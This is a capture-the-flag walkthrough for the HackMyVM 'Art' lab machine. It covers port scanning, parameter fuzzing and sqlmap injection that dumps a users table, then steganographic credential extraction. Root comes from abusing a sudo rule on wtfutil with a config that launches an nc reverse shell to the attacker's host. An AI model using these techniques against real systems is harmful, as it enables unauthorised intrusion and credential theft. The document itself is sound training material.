NOTES ABOUT Art
[ 2022-09-30 ] [ HackMyVM / Art ]Status: Rooted
Skills: Port Scanning, Fuzzing, SQLi, Steganography, SSH, Sudo
Tools: nmap, wfuzz, sqlmap, steghide, nc
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.11
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 45:42:0f:13:cc:8e:49:dd:ec:f5:bb:0f:58:f4:ef:47 (RSA)
| 256 12:2f:a3:63:c2:73:99:e3:f8:67:57:ab:29:52:aa:06 (ECDSA)
|_ 256 f8:79:7a:b1:a8:7e:e9:97:25:c3:40:4a:0c:2f:5e:69 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0
GETTING IN
DYNAMIC TAG PARAM DETECTION:
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/url-params_from-top-55-most-popular-apps.txt -r 5 --hw 17 http://10.0.2.12/index.php?FUZZ=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.0.2.12/index.php?FUZZ=FUZZ
Total requests: 211
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000097: 200 4 L 12 W 70 Ch "tag - tag"
NO LFI SO...
$ sqlmap -u "http://10.0.2.12/index.php?tag=" --dbs
$ sqlmap -u "http://10.0.2.12/index.php?tag=" -D gallery --tables
$ sqlmap -u "http://10.0.2.12/index.php?tag=" -D gallery -T users --dump
$ sqlmap -u "http://10.0.2.12/index.php?tag=" -D gallery -T art --dump
+----+-----------------+--------+
| id | pass | user |
+----+-----------------+--------+
| 1 | realpazz | mina |
| 2 | mncxzKLLJDS | me |
| 3 | 987dsKLDSOIU | lula |
| 4 | BDSAOIUYEW | notme |
| 5 | dsOIUSDAOydsa | mona |
| 6 | EWQUDSAdaSDSA= | admin |
| 7 | VCXddsaEWQdsa_D | lila |
| 8 | DSAewqDSAewq | root |
+----+-----------------+--------+
+----+-----------+---------------+
| id | tag | image |
+----+-----------+---------------+
| 5 | beauty | dsa32.jpg |
+----+-----------+---------------+
$ steghide extract -sf dsa32.jpg
Enter passphrase:
wrote extracted data to "yes.txt".
$ cat yes.txt
lion/shel0vesyou
$ssh lion@10.0.2.12
ELEVATING PRIVILEGES
$ sudo -l
Matching Defaults entries for lion on art:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lion may run the following commands on art:
(ALL : ALL) NOPASSWD: /bin/wtfutil
https://github.com/wtfutil/wtf/blob/master/_sample_configs/small_config.yml
python3 -m http.server
cat c.yml
wtf:
grid:
columns: [20, 20]
rows: [3, 3]
refreshInterval: 1
mods:
uptime:
type: cmdrunner
args: ['-e','/bin/bash','10.0.2.15','443']
cmd: "nc"
enabled: true
position:
top: 0
left: 0
height: 1
width: 1
refreshInterval: 30
REVERSE SHELL LISTENER:
$ nc -lvnp 443
GETTING REVERSE ROOT SHELL
$ wget http://10.0.2.12:8000/c.yml
$ sudo -u root /bin/wtfutil --config=c.yml
$ find / -name root.txt
/var/opt/root.txt
$ ls -lah /var/opt/root.txt
-rw------- 1 root root 24 ago 3 11:17 /var/opt/root.txt
# init 0